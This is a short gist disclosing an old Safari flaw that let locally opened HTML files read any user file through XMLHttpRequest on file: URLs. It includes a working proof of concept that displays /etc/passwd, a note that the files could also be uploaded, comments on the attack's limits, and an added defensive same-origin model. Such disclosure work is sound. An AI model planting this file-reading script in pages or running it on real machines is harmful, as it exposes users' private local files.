Last active
August 29, 2015 14:17
Safari FILE: scheme security hole
It appears that Safari does not enforce any kind of access
restrictions for XMLHttpRequests on FILE: scheme URLs. As a
result, any HTML file on the local file system that is opened in
Safari can read any file that the user has access to (and, of
course, it can upload those files too). Here's a little
proof-of-concept. Copy and paste this into a local HTML file and
open it in Safari. It will display the contents of /etc/passwd.
<script src="https://code.jquery.com/jquery-2.1.3.min.js"></script>
<script>
// Relative to a file: document, '/etc/passwd' resolves to file:///etc/passwd
$.ajax({url: '/etc/passwd'}).done(function (s) {
  $('body').html('<pre>' + s + '</pre>');
});
</script>
Tested on Safari 7.1.4. FF and Chrome do not appear to have this problem.

UPDATE: Turns out this is a known problem:
https://community.rapid7.com/community/metasploit/blog/2013/04/25/abusing-safaris-webarchive-file-format
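As an added illustration (not part of the gist, and not Safari's or any browser's actual code), here is a simplified model of the same-origin decision that stops this read in the other browsers: a file: document is treated as an opaque origin, so it may not read any other URL via XHR. Function names and sample paths are assumptions made for the example; CORS headers are not modelled.

```javascript
// Added example (not from the gist): a simplified model of the same-origin
// check a browser should apply before letting a document read a URL via
// XMLHttpRequest. file: documents get an opaque origin, which is what the URL
// Standard recommends when in doubt and is consistent with the gist's note
// that Firefox and Chrome refuse this read. Names and URLs are constructed.

// Schemes whose origin is a (scheme, host, port) tuple; anything else
// (file:, data:, about:, ...) is treated as opaque here.
const TUPLE_SCHEMES = new Set(['http:', 'https:', 'ws:', 'wss:', 'ftp:']);

// Returns the serialized tuple origin, or null for an opaque origin.
function originOf(urlString) {
  const u = new URL(urlString);
  if (!TUPLE_SCHEMES.has(u.protocol)) {
    return null;
  }
  // u.host already carries an explicit non-default port, e.g. "a.example:8443",
  // and omits a default one, so scheme + host is a complete origin string.
  return `${u.protocol}//${u.host}`;
}

// Same-origin decision for a read via XHR. CORS response headers are not
// modelled: a cross-origin tuple read is simply refused.
function xhrReadAllowed(documentUrl, requestUrl) {
  const docOrigin = originOf(documentUrl);
  const reqOrigin = originOf(requestUrl);
  // An opaque origin is same-origin with nothing, not even itself, so a
  // file: page can never read another file: URL under this policy.
  if (docOrigin === null || reqOrigin === null) {
    return false;
  }
  return docOrigin === reqOrigin;
}

// The gist's PoC as this policy would judge it: a local HTML file requesting
// '/etc/passwd' resolves that path against its own file: URL and is refused.
const POC_DOCUMENT = 'file:///Users/someone/poc.html'; // constructed path
const POC_TARGET = new URL('/etc/passwd', POC_DOCUMENT).href; // file:///etc/passwd
console.log(POC_TARGET, xhrReadAllowed(POC_DOCUMENT, POC_TARGET)); // file:///etc/passwd false
```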
I dunno, this seems pretty bad to me. Why do you think it's not?
@rongarret I think @chesleybrown thought that the file could be hosted on a website and display local files. It needs to be opened locally for it to be able to read local files.
Ah, now that's not nearly as bad as I had originally thought. I was losing my mind there for a few minutes thinking "No way... no way is it that simple". lol